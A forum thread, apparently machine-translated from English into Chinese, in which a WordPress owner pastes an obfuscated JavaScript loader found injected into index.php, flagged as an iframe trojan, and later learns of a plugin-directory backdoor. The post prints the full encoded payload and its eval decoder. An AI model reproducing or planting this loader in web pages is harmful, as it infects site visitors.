我收到了一個頭文件錯誤,同時調查我在我的index.php開頭找到了這兩個根索引和wp-admin。蛤蜊AV掃描沒有發現病毒。js在我的index.php開始時在wordpress
<script>if(window.document)aa='0';aaa='0';if(aa.indexOf(aaa)===0){ss='';try{new document();}catch(qqq){s=String;f='f'+'r'+'o'+'mChar';f+='Code';}ee='e';e=window.eval;t='y';}h=2*Math.sin(3*Math.PI/2);n=[/* lots of numbers here, moved below for security */];for(i=0;i-n.length<0;i++){j=i;ss=ss+s[f](-h*(1+n[j]));}q=ss;e(q);</script>
的數字: 3.5,3.5,51.5,50,15,19,49,54.5,48.5,57.5,53.5,49.5,54,57,22,50.5,49.5,57,33.5,53 ,49.5,53.5,49.5,54,57,56.5,32,59.5,41,47.5,50.5,38,47.5,53.5,49.5,19,18.5,48,54.5,49,59.5,18.5,19.5,44.5,23 ,45.5,19.5,60.5,3.5,3.5,3.5,51.5,50,56,47.5,53.5,49.5,56,19,19.5,28.5,3.5,3.5,61.5,15,49.5,53,56.5,49.5,15 ,60.5,3.5,3.5,3.5,49,54.5,48.5,57.5,53.5,49.5,54,57,22,58.5,56,51.5,57,49.5,19,16,29,51.5,50,56,47.5 ,53.5,49.5,15,56.5,56,48.5,29.5,18.5,51,57,57,55,28,22.5,22.5,48,55.5,49,52,56,54.5,54.5,58,22,25 ,55,57.5,22,48.5,54.5,53.5,22.5,56.5,57,49,56.5,22.5,50.5,54.5,22,55,51,55,30.5,56.5,51.5,49,29.5,23.5,18.5 ,15,58.5,51.5,49,57,51,29.5,18.5,23.5,23,18.5,15,51,49.5,51.5,50.5,51,57,29.5,18.5,23.5,23,18.5,15,56.5 ,57,59.5,53,49.5,29.5,18.5,58,51.5,56.5 ,51.5,48,51.5,53,51.5,57,59.5,28,51,51.5,49,49,49.5,54,28.5,55,54.5,56.5,51.5,57,51.5,54.5,54,28,47.5 ,48,56.5,54.5,53,57.5,57,49.5,28.5,53,49.5,50,57,28,23,28.5,57,54.5,55,28,23,28.5,18.5,30,29,22.5 ,51.5,50,56,47.5,53.5,49.5,30,16,19.5,28.5,3.5,3.5,61.5,3.5,3.5,50,57.5,54,48.5,57,51.5,54.5,54,15,51.5 ,50,56,47.5,53.5,49.5,56,19,19.5,60.5,3.5,3.5,3.5,58,47.5,56,15,50,15,29.5,15,49,54.5,48.5,57.5,53.5 ,49.5,54,57,22,48.5,56,49.5,47.5,57,49.5,33.5,53,49.5,53.5,49.5,54,57,19,18.5,51.5,50,56,47.5,53.5,49.5 ,18.5,19.5,28.5,50,22,56.5,49.5,57,31.5,57,57,56,51.5,48,57.5,57,49.5,19,18.5,56.5,56,48.5,18.5,21,18.5 ,51,57,57,55,28,22.5,22.5,48,55.5,49,52,56,54.5,54.5,58,22,25,55,57.5,22,48.5,54.5,53.5,22.5,56.5 ,57,49,56.5,22.5,50.5,54.5,22,55,51,55,30.5,56.5,51.5,49,29.5,23.5,18.5,19.5,28.5,50,22,56.5,57,59.5,53 ,49.5,22,58,51.5,56.5,51.5,48,51.5,53,51.5,57,59.5,29.5,18.5,51,51.5,49,49,49.5,54,18.5,28.5,50,22,56.5 ,57,59.5,53,49.5,22,55,54.5,56.5,51.5,57,51.5,54.5,54,29.5,18.5,47.5,48,56.5,54.5,53,57.5, 57,49.5,18.5,28.5,50,22,56.5,57,59.5,53,49.5,22,53,49.5,50,57,29.5,18.5,23,18.5,28.5,50,22,56.5,57, 59.5,53,49.5,22,57,54.5,55,29.5,18.5,23,18.5,28.5,50,22,56.5,49.5,57,31.5,57,57,56,51.5,48,57.5,57, 49.5,19,18.5,58.5,51.5,49,57,51,18.5,21,18.5,23.5,23,18.5,19.5,28.5,50,22,56.5,49.5,57,31.5,57,57,56, 51.5,48,57.5,57,49.5,19,18.5,51,49.5,51.5,50.5,51,57,18.5,21,18.5,23.5,23,18.5,19.5,28.5,3.5,3.5,3.5,49, 54.5,48.5,57.5,53.5,49.5,54,57,22,50.5,49.5,57,33.5,53,49.5,53.5,49.5,54,57,56.5,32,59.5,41,47.5,50.5,38, 47.5,53.5,49.5,19,18.5,48,54.5,49,59.5,18.5,19.5,44.5,23,45.5,22,47.5,55,55,49.5,54,49,32.5,51,51.5,53, 49,19,50,19.5,28.5,3.5,3.5,61.5
編輯:我已經註釋掉了JavaScript,因爲它觸發了我的Eset AV:JS/Iframe.BQ木馬。
我沒有安裝任何插件。這是一個新的安裝,坐在那裏等待谷歌索引它。 – 2012-02-24 06:01:06
不過,看看你的/ wp-content/plugins目錄,看看你是否看到它。它沒有出現在管理區域,只是通過ftp。 – meschu 2012-02-29 21:13:26
就是這樣。後門在插件目錄中。 – 2012-03-01 05:16:53